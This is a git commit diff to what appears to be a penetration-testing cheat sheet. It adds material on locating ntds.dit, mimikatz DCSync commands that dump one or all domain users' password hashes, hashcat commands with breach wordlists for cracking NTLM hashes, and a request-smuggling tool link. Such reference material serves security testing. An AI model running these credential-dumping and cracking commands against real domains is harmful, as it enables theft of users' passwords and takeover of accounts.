NTLM Hashcat
parent
6a82f47f32
commit
bd184487e5
|
@ -539,9 +539,19 @@ New-GPOImmediateTask -TaskName Debugging -GPODisplayName VulnGPO -CommandArgumen
|
||||||
### Dumping AD Domain Credentials
|
### Dumping AD Domain Credentials
|
||||||
|
|
||||||
You will need the following files to extract the ntds :
|
You will need the following files to extract the ntds :
|
||||||
- ntds file (C:\Windows\NTDS\ntds.dit)
|
- NTDS.dit file
|
||||||
- SYSTEM hive (C:\Windows\System32\SYSTEM)
|
- SYSTEM hive (C:\Windows\System32\SYSTEM)
|
||||||
|
|
||||||
|
Usually you can find the ntds in two locations : `systemroot\NTDS\ntds.dit` and `systemroot\System32\ntds.dit`.
|
||||||
|
- `systemroot\NTDS\ntds.dit` stores the database that is in use on a domain controller. It contains the values for the domain and a replica of the values for the forest (the Configuration container data).
|
||||||
|
- `systemroot\System32\ntds.dit` is the distribution copy of the default directory that is used when you install Active Directory on a server running Windows Server 2003 or later to create a domain controller. Because this file is available, you can run the Active Directory Installation Wizard without having to use the server operating system CD.
|
||||||
|
|
||||||
|
However you can change the location to a custom one, you will need to query the registry to get the current location.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
reg query HKLM\SYSTEM\CurrentControlSet\Services\NTDS\Parameters /v "DSA Database file"
|
||||||
|
```
|
||||||
|
|
||||||
#### Using ndtsutil
|
#### Using ndtsutil
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
|
@ -653,7 +663,11 @@ cme smb 10.10.0.202 -u username -p password --ntds drsuapi #default
|
||||||
Any member of Administrators, Domain Admins, or Enterprise Admins as well as Domain Controller computer accounts are able to run DCSync to pull password data.
|
Any member of Administrators, Domain Admins, or Enterprise Admins as well as Domain Controller computer accounts are able to run DCSync to pull password data.
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
|
# DCSync only one user
|
||||||
mimikatz# lsadump::dcsync /domain:htb.local /user:krbtgt
|
mimikatz# lsadump::dcsync /domain:htb.local /user:krbtgt
|
||||||
|
|
||||||
|
# DCSync all users of the domain
|
||||||
|
mimikatz# lsadump::dcsync /domain:htb.local /all /csv
|
||||||
```
|
```
|
||||||
|
|
||||||
:warning: Read-Only Domain Controllers are not allowed to pull password data for users by default.
|
:warning: Read-Only Domain Controllers are not allowed to pull password data for users by default.
|
||||||
|
@ -668,6 +682,30 @@ sekurlsa::krbtgt
|
||||||
lsadump::lsa /inject /name:krbtgt
|
lsadump::lsa /inject /name:krbtgt
|
||||||
```
|
```
|
||||||
|
|
||||||
|
#### Crack NTLM hashes with hashcat
|
||||||
|
|
||||||
|
Useful when you want to have the clear text password or when you need to make stats about weak passwords.
|
||||||
|
|
||||||
|
Recommended wordlists:
|
||||||
|
- rockyou (available in Kali Linux)
|
||||||
|
- Have I Been Powned (https://hashes.org/download.php?hashlistId=7290&type=hfound)
|
||||||
|
- Collection #1 (passwords from Data Breaches, might be illegal to possess)
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
# Basic wordlist
|
||||||
|
# (-O) will Optimize for 32 characters or less passwords
|
||||||
|
# (-w 4) will set the workload to "Insane"
|
||||||
|
$ hashcat64.exe -m 1000 -w 4 -O -a 0 -o pathtopotfile pathtohashes pathtodico -r ./rules/best64.rule --opencl-device-types 1,2
|
||||||
|
|
||||||
|
# Generate a custom mask based on a wordlist
|
||||||
|
$ git clone https://github.com/iphelix/pack/blob/master/README
|
||||||
|
$ python2 statsgen.py ../hashcat.potfile -o hashcat.mask
|
||||||
|
$ python2 maskgen.py hashcat.mask --targettime 3600 --optindex -q -o hashcat_1H.hcmask
|
||||||
|
```
|
||||||
|
|
||||||
|
:warning: If the password is not a confidential data (challenges/ctf), you can use online "cracker" like :
|
||||||
|
- [hashes.org](https://hashes.org/check.php)
|
||||||
|
- [hashes.com](https://hashes.com/en/decrypt/hash)
|
||||||
|
|
||||||
### Password spraying
|
### Password spraying
|
||||||
|
|
||||||
|
|
|
@ -2,11 +2,15 @@
|
||||||
|
|
||||||
## Summary
|
## Summary
|
||||||
|
|
||||||
|
* [Tools](#tools)
|
||||||
* [CL.TE vulnerabilities](#cl.te-vulnerabilities)
|
* [CL.TE vulnerabilities](#cl.te-vulnerabilities)
|
||||||
* [TE.CL vulnerabilities](#te.cl-vulnerabilities)
|
* [TE.CL vulnerabilities](#te.cl-vulnerabilities)
|
||||||
* [TE.TE behavior: obfuscating the TE header](#te.te-behavior-obfuscating-the-te-header)
|
* [TE.TE behavior: obfuscating the TE header](#te.te-behavior-obfuscating-the-te-header)
|
||||||
* [References](#references)
|
* [References](#references)
|
||||||
|
|
||||||
|
## Tools
|
||||||
|
|
||||||
|
* [HTTP Request Smuggler / BApp Store](https://portswigger.net/bappstore/aaaa60ef945341e8a450217a54a11646)
|
||||||
|
|
||||||
## CL.TE vulnerabilities
|
## CL.TE vulnerabilities
|
||||||
|
|
||||||
|
@ -101,3 +105,4 @@ Challenge: https://portswigger.net/web-security/request-smuggling/lab-ofuscating
|
||||||
## References
|
## References
|
||||||
|
|
||||||
* [PortSwigger - Request Smuggling](https://portswigger.net/web-security/request-smuggling)
|
* [PortSwigger - Request Smuggling](https://portswigger.net/web-security/request-smuggling)
|
||||||
|
* [A Pentester's Guide to HTTP Request Smuggling - Busra Demir - 2020, October 16](https://blog.cobalt.io/a-pentesters-guide-to-http-request-smuggling-8b7bf0db1f0)
|
Loading…
Reference in New Issue